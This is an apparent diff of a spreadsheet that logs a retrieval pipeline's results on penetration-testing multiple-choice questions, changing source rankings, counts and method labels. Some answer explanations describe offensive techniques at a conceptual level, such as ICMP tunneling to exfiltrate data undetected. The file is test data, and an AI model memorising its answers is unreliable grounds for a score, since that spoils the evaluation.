       </c>
     </row>
@@ -1407,16 +1407,16 @@
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: ef0b0c6f-967c-4d9f-b6d0-481a2990da2e, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I15" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J15" t="n">
@@ -1424,7 +1424,7 @@
       </c>
       <c r="K15" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1476,14 +1476,14 @@
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I16" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J16" t="n">
@@ -1491,7 +1491,7 @@
       </c>
       <c r="K16" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1542,15 +1542,15 @@
 preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 9)
 rop-return-oriented-programming.md (Chunk: f7923ee6-edf7-4858-8b01-3be18b188df6, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I17" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J17" t="n">
@@ -1558,7 +1558,7 @@
       </c>
       <c r="K17" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1612,12 +1612,12 @@
 preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I18" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J18" t="n">
@@ -1625,7 +1625,7 @@
       </c>
       <c r="K18" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1676,15 +1676,15 @@
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: afb1aa10-4e40-43c7-8bb6-da790de907eb, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 24d42d52-9752-47f6-b94e-1701dca4040a, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I19" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J19" t="n">
@@ -1692,7 +1692,7 @@
       </c>
       <c r="K19" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1745,13 +1745,13 @@
 suryanshp1-kali-linux-pentesting-data.md (Chunk: 5b5db436-b4dc-45b7-8932-f9b0ee716fb8, Type: dense, Rank: 6)
 cowWhySo-pentest-redteam-steering.md (Chunk: 830142da-9e35-4e79-98ea-6eaa7a78fec1, Type: dense, Rank: 7)
 suryanshp1-kali-linux-pentesting-data.md (Chunk: 17f94819-48bb-4a9c-b1f5-0f9f88c30658, Type: dense, Rank: 8)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 3c59efec-aece-45e3-aca3-adcffe36d561, Type: dense, Rank: 9)
+suryanshp1-kali-linux-pentesting-data.md (Chunk: 3c59efec-aece-45e3-aca3-adcffe36d561, Type: sparse, Rank: 9)
 suryanshp1-kali-linux-pentesting-data.md (Chunk: 015f2406-4ff4-4680-841a-81a58a919933, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I20" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J20" t="n">
@@ -1759,7 +1759,7 @@
       </c>
       <c r="K20" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1810,7 +1810,7 @@
 preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 140bf297-3b8f-4cda-8b62-a97281432e55, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
@@ -1818,7 +1818,7 @@
       </c>
       <c r="I21" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J21" t="n">
@@ -1826,7 +1826,7 @@
       </c>
       <c r="K21" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1871,21 +1871,21 @@
       </c>
       <c r="H22" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 94e49890-47aa-4ca3-9707-9d1cb00040dc, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 94e49890-47aa-4ca3-9707-9d1cb00040dc, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I22" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J22" t="n">
@@ -1893,7 +1893,7 @@
       </c>
       <c r="K22" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1928,7 +1928,7 @@
       <c r="F23" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow
-Explanation: Buffer overflow vulnerabilities are commonly exploited for remote code execution, where an attacker sends inputs that are deliberately crafted to exceed the buffer's allocation size. This can overwrite adjacent memory locations, potentially allowing arbitrary code execution if carefully manipulated. Zero-day exploits refer to vulnerabilities unknown to parties other than the attackers, and may involve various types of weaknesses, not specifically buffer overflows. SQL injection and Cross-site scripting (XSS) are different classes of vulnerabilities primarily associated with web applications and deal with injecting malicious SQL code and scripts, respectively, rather than exploiting memory corruption issues.</t>
+Explanation: Buffer overflow vulnerabilities are commonly exploited for remote code execution, where an attacker sends inputs that are deliberately crafted to exceed the buffer's allocation size. This can overwrite adjacent memory locations, potentially allowing arbitrary code execution if carefully manipulated. Zero-day exploits refer to vulnerabilities unknown to parties other than the attackers and may involve various types of weaknesses, not specifically buffer overflows. SQL injection and Cross-site scripting (XSS) are different classes of vulnerabilities primarily associated with web applications and deal with injecting malicious SQL code and scripts, respectively, rather than exploiting memory corruption issues.</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -1946,13 +1946,13 @@
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e40e4c76-2816-4f1b-b4a9-e43d8e206282, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I23" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J23" t="n">
@@ -1960,7 +1960,7 @@
       </c>
       <c r="K23" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2006,20 +2006,20 @@
       <c r="H24" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I24" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J24" t="n">
@@ -2027,7 +2027,7 @@
       </c>
       <c r="K24" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2080,13 +2080,13 @@
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 6)
 cowWhySo-pentest-redteam-steering.md (Chunk: 161bbefa-f921-4138-90fe-7697803bdba8, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 8)
-rop-return-oriented-programming.md (Chunk: f7923ee6-edf7-4858-8b01-3be18b188df6, Type: dense, Rank: 9)
+rop-return-oriented-programming.md (Chunk: f7923ee6-edf7-4858-8b01-3be18b188df6, Type: sparse, Rank: 9)
 cowWhySo-pentest-redteam-steering.md (Chunk: 072e1153-c8f2-44d2-b09b-af0c695f2650, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I25" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J25" t="n">
@@ -2094,7 +2094,7 @@
       </c>
       <c r="K25" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2161,7 +2161,7 @@
       </c>
       <c r="K26" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2212,15 +2212,15 @@
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I27" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J27" t="n">
@@ -2228,7 +2228,7 @@
       </c>
       <c r="K27" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2263,7 +2263,7 @@
       <c r="F28" t="inlineStr">
         <is>
           <t>Answer: Using a customized ICMP tunneling protocol
-Explanation: Using a customized ICMP tunneling protocol is the most effective technique for exfiltrating data from a highly secured network without alerting traditional security tools. This method exploits the fact that many security measures overlook ICMP traffic, considering it benign. Unlike HTTP GET requests, which could be monitored and blocked by web proxies and security gateways, ICMP tunneling leverages the less scrutinized ICMP protocol to transfer data outside the network in an obfuscated manner. While exploiting an SQL injection vulnerability might allow data exfiltration, it is not specifically designed for avoiding signature detection at the payload level. Sending a phishing email with an attachment could potentially be detected by email security measures and may not directly facilitate data exfiltration from a network.</t>
+Explanation: Using a customized ICMP tunneling protocol is the most effective technique for exfiltrating data from a highly secured network without alerting traditional security tools. This method exploits the fact that many security measures overlook ICMP traffic, considering it benign. Unlike HTTP GET requests, which could be monitored and blocked by web proxies and security gateways, ICMP tunneling leverages the less scrutinized ICMP protocol to transfer data outside the network in an obfuscated manner.</t>
         </is>
       </c>
       <c r="G28" t="inlineStr">
@@ -2276,18 +2276,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I28" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J28" t="n">
@@ -2295,7 +2295,7 @@
       </c>
       <c r="K28" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2343,18 +2343,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I29" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 4, Keyword: 6, Total: 10</t>
         </is>
       </c>
       <c r="J29" t="n">
@@ -2362,7 +2362,7 @@
       </c>
       <c r="K29" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2429,7 +2429,7 @@
       </c>
       <c r="K30" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2471,8 +2471,9 @@
 resist removal efforts. This choice is strategic in a scenario requiring stealth and long-term access. Utilizing
 phishing emails to distribute ransomware, while effective for immediate disruptions, does not typically establish
 long-term access and is more detectable. Exploiting a zero-day vulnerability in a third-party software library can
-provide initial access but does not inherently provide persistent host access, and performing a man-in-the-middle
-attack on a secured Wi-Fi network may be detected by intrusion detection systems or VPNs.</t>
+provide initial access but doesn't inherently provide persistent access or stealth. Performing a man-in-the-middle
+attack on a secured Wi-Fi network may allow for interception of data, but it does not guarantee long-term access
+or persistence on the server itself.</t>
         </is>
       </c>
       <c r="G31" t="inlineStr">
@@ -2484,19 +2485,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 10)</t>
         </is>
